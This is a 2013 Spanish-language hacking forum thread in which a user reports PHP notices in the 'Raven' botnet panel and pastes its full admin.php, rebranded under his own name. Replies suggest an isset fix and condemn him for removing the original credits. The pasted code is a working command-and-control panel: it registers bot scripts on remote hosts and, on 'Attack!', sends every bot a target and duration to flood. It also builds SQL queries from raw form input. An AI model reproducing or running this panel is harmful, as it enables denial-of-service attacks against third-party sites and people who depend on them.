help_outline
Ayudanos!
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Botnet Raven error!

  • 9 Respuestas
  • 3977 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado PW[N]ED

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • PW[N]ED underc0de.-!
    • Ver Perfil
  • Skype: the.joker.crack
« en: Julio 01, 2013, 02:23:52 pm »
Miren este lindo error que encontre en la botnet raven de undercode ;

Código: PHP
  1. Notice: Undefined index: target in /opt/lampp/htdocs/Raven/admin.php on line 10
  2.  
  3. Notice: Undefined index: time in /opt/lampp/htdocs/Raven/admin.php on line 11
  4.  
  5. Notice: Undefined index: bot in /opt/lampp/htdocs/Raven/admin.php on line 12

y las lineas son estas

Código: PHP
  1.     $obj=$_POST['target'];
  2.     $tiempo=$_POST['time'];
  3.     $bot=htmlentities($_POST['bot'], ENT_QUOTES);


el codigo entero es este


Código: PHP
  1. <?
  2.  
  3. if ($_SESSION['estado']!="log") {
  4.     echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php">';
  5. }
  6. else {
  7.  
  8. //insert bot
  9.     $obj=$_POST['target'];
  10.     $tiempo=$_POST['time'];
  11.     $bot=htmlentities($_POST['bot'], ENT_QUOTES);
  12.    
  13.  
  14.  
  15.     include('config.php');
  16.     $exts=explode(".", $bot);
  17.     $exts2=end($exts);
  18.     if(isset($_POST['add'])) {
  19.         //control ext
  20.         if(!filter_var($bot, FILTER_VALIDATE_URL)){
  21.             echo "<script>alert('Ingrese una url valida!'); </script>";
  22.         }
  23.        
  24.         elseif($exts2!="php"){
  25.             echo "<script>alert('No se encontro un script valido en la url!'); </script>";
  26.        }
  27.     //
  28.         else{
  29.             $bot2=str_ireplace("http://", "", $bot);
  30.             $bot3=explode("/", $bot2);
  31.             $corta=explode("/", $bot2);
  32.             unset($corta[0]);
  33.             $path=implode("/", $corta);
  34.             $ip=gethostbyname($bot3[0]);
  35.             $flag=file_get_contents("http://geoip.wtanaka.com/cc/".$ip);
  36.             $insert="INSERT INTO bots (ip, host, path, location) VALUES('$ip', '$bot3[0]', '$path', '$flag');";
  37.             $cons=mysqli_query($conexion, $insert);
  38. }
  39.     }
  40. //attack
  41. //coneccion bot
  42. //cabeceras http
  43.     $encod="target=".$obj."&time=".$tiempo."&start=Attack%21";
  44.     $long=strlen($encod);
  45.     if(isset($_POST['start'])) {
  46.         $consulta="SELECT host,path FROM bots;";
  47.         $consulta2=mysqli_query($conexion, $consulta);
  48.         while($data=mysqli_fetch_array($consulta2, MYSQLI_ASSOC)){
  49.             $socket=fsockopen($data['host'], 80);
  50.             fputs($socket, "POST /".$data['path']." HTTP/1.0\r\n");
  51.             fputs($socket, "Host: ".$data['host']."\r\n");
  52.             fputs($socket, "Content-Type: application/x-www-form-urlencoded\r\n");
  53.             fputs($socket, "Content-Length:". $long."\r\n\r\n");
  54.             fputs($socket, $encod);
  55.             fclose($socket);
  56.      
  57. }
  58. }
  59. //bots count
  60.     $num="SELECT * FROM bots;";
  61.     $num1=mysqli_query($conexion, $num);
  62.  
  63.       echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//ES" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  64. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
  65.  
  66.    
  67.    <head>
  68.       <meta charset="UTF-8">
  69.       <meta name="author" content="[Q]3rV[0]" />
  70.       <meta name="language" content="spanish" />  
  71.       <meta http-equiv="Content-Type" content="text/html" />
  72.       <title>PW[N]ED Botnet v1.0 | ForoMalware</title>
  73.      
  74.       <link rel="icon" href="img/favicon.ico" type="image/x-icon" />      
  75.      
  76.       <link type="text/css" rel="stylesheet" href="css/raven.css" />
  77.      
  78.       <script type="text/javascript" src="js/jquery-1.3.2.min.js"></script>
  79.       <script type="text/javascript" src="js/jquery.easing.1.2.js"></script>
  80.       <script type="text/javascript" src="js/jquery.prettyPhoto.js"></script>
  81.       <script type="text/javascript" src="js/cufon-yui.js"></script>
  82.       <script type="text/javascript" src="js/Sansation_700.font.js"></script>  
  83.       <script type="text/javascript" src="js/Sansation_400.font.js"></script>    
  84.       <script type="text/javascript" src="js/Sansation_300.font.js"></script>  
  85.       <script type="text/javascript" src="js/common.js"></script>
  86.       <script type="text/javascript" src="js/raven.js"></script>'; ?>
  87.        
  88.    
  89.         <script type="text/javascript" src="lib/DD_belatedPNG_0.0.8a-min.js"></script>
  90.         <script>
  91.           DD_belatedPNG.fix(".ie6PNGfix , .commonLink");
  92.          
  93.           /* string argument can be any CSS selector */
  94.           /* .ie6PNGfix example is unnecessary */
  95.           /* change it to what suits you! */
  96.         </script>
  97.    
  98.  
  99.                
  100.     <?php echo '</head>
  101.    
  102.    <body>
  103.      
  104.      <div id="headerContainer">
  105.        <a name="pageTopAnchor"></a>
  106.        <a href="index.php" id="logo" class="ie6PNGfix"></a>
  107.        <div id="titleWrapper">                              
  108.          <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
  109.          <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
  110.        </div>
  111.              
  112.        </div>
  113.  
  114.        <div id="bodyContainer2">    
  115.          <div id="navigationContainer">            
  116.            <ul class="rootnav">
  117.                <li><a href="logout.php">logout</a></li>
  118.            </ul>
  119.          </div>
  120.            
  121.          <div id="servicesContentContainer">          
  122.            <div id="servicesContainer">
  123.            <div id="servicesBigInfo">
  124.            <br />
  125.              <form action="#" method="POST">
  126.                <center>
  127.                  <h3 id="servicesProductsHeader">Add Bot <img src=img/add.png height=40 weight=40></h3><br />        
  128.                  Raven URL: <input class="url" name="bot" value="" type="text" />
  129.                  <br /><br />
  130.                  <input type="submit" class="btn" name="add" value="Add Bot">
  131.                  <br />
  132.                </center>
  133.              </form>
  134.                <center>
  135.              <a href=bots.php target="blank">Bots: '.mysqli_num_rows($num1).'</a>
  136.                
  137.              <hr><br />
  138.  
  139.              <div class="item"></div>
  140.  
  141.              <h3 id="servicesProductsHeader">Attack <img src=img/attack.png height=40 weight=40></h3><br />
  142.              
  143.              <form action="#" method="POST">
  144.                Target URL/IP: <input class="url" name="target" value="" /> Time: <input class="url2" name="time" value="" />
  145.                <br /><br />
  146.                <input type="submit" class="btn" name="start" value="Attack!">
  147.              </form>
  148.              </center>
  149.                
  150.                                                                  
  151.            </div>                                                                                                                    
  152.          </div>                          
  153.        </div>
  154.        <div class="clearBoth"></div>                      
  155.      </div>
  156.      <br />
  157.    </body>
  158. </html>';
  159. }
  160. ?>
« Última modificación: Febrero 09, 2014, 11:00:55 am por Expermicid »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1915
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Julio 16, 2013, 03:57:48 pm »
No la he probado, asique no se como es, pero has ingresado correctamente todos los campos? has revisado que el resto de las cosas funcionen? puede ser que el hosting haya quitado alguna función y por eso se produce el error.

Subelo a otro host, lo pruebas y si te sigue dando el mismo error, me avisas, lo descargo lo testeo y te digo :)

Un saludo.



Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 554
  • Actividad:
    3.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #2 en: Julio 16, 2013, 05:49:24 pm »
ahi deberia aver un isset en el envio de esta manera no sale ese error, es decir si se envia el formulario, entonces esas variables si existen sino no existen :P

Código: [Seleccionar]
<div id="titleWrapper">                             
         <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
         <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
       </div>


WTF?

salu2

« Última modificación: Julio 16, 2013, 05:54:47 pm por arthusu »
Pentest - Hacking & Security Services

Contact me: arthusu@gmail.com

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #3 en: Julio 16, 2013, 08:27:56 pm »
ahi deberia aver un isset en el envio de esta manera no sale ese error, es decir si se envia el formulario, entonces esas variables si existen sino no existen :P

Código: [Seleccionar]
<div id="titleWrapper">                             
         <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
         <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
       </div>


WTF?

salu2

Ningun WTF!! Claro como el agua un C&P  :D
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Julio 16, 2013, 08:43:52 pm »
Ripper detected :3
El conocimiento es libre...
La información no lo es xD

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5427
  • Actividad:
    35%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Julio 17, 2013, 09:15:25 am »
Código: HTML5
  1. <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
  2. <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>

Se agradece el reporte del bug, pero ni siquiera entras en la categoria de script kiddie... es LAMMERtable tu actitud de modificar el codigo fuente y ponerle tus creditos... asi es como agradeces el trabajo de Cuervo y de todo underc0de que se esforzo y le dedico tiempo al proyecto?


Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #6 en: Julio 17, 2013, 09:26:43 am »
Código: [Seleccionar]
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
         <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>

Si se supone que la hiciste tu deberías saber arreglar el bug...
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #7 en: Julio 17, 2013, 10:00:09 am »
Pues si, un tanto lamentable...

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #8 en: Julio 17, 2013, 10:58:27 am »
FAIL.

Desde luego que eso que has hecho esta muy mal.

Desconectado Kodeinfect

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Kodeinfect's Blog
« Respuesta #9 en: Julio 17, 2013, 11:09:19 am »
Esto se desvió del post original, una lastima la actitud del usuario.
TEMA CERRADO.

 

¿Te gustó el post? COMPARTILO!



Error con ffmpeg en android con android studio

Iniciado por $francisco

Respuestas: 6
Vistas: 2577
Último mensaje Mayo 16, 2015, 12:52:46 pm
por $francisco
Error "modo Monitor" TL-WN722N

Iniciado por L€XN0

Respuestas: 10
Vistas: 2029
Último mensaje Mayo 31, 2018, 08:36:34 pm
por K A I L
Error al abrir cualquier sistema operativo dese usb: "Failed to find cpu0 node"

Iniciado por thecloudff7

Respuestas: 12
Vistas: 4455
Último mensaje Febrero 14, 2016, 05:10:47 pm
por thecloudff7
¡AYUDA! Error al instalar cualquier aplicacion vía "Apt-Get"

Iniciado por iGreentick

Respuestas: 5
Vistas: 1785
Último mensaje Octubre 13, 2016, 01:44:28 am
por puntoCL
No me funciona el exploit por error de sintaxis (DirtyCow u otro exploit.c)

Iniciado por banderas20

Respuestas: 5
Vistas: 689
Último mensaje Septiembre 13, 2018, 03:30:01 pm
por banderas20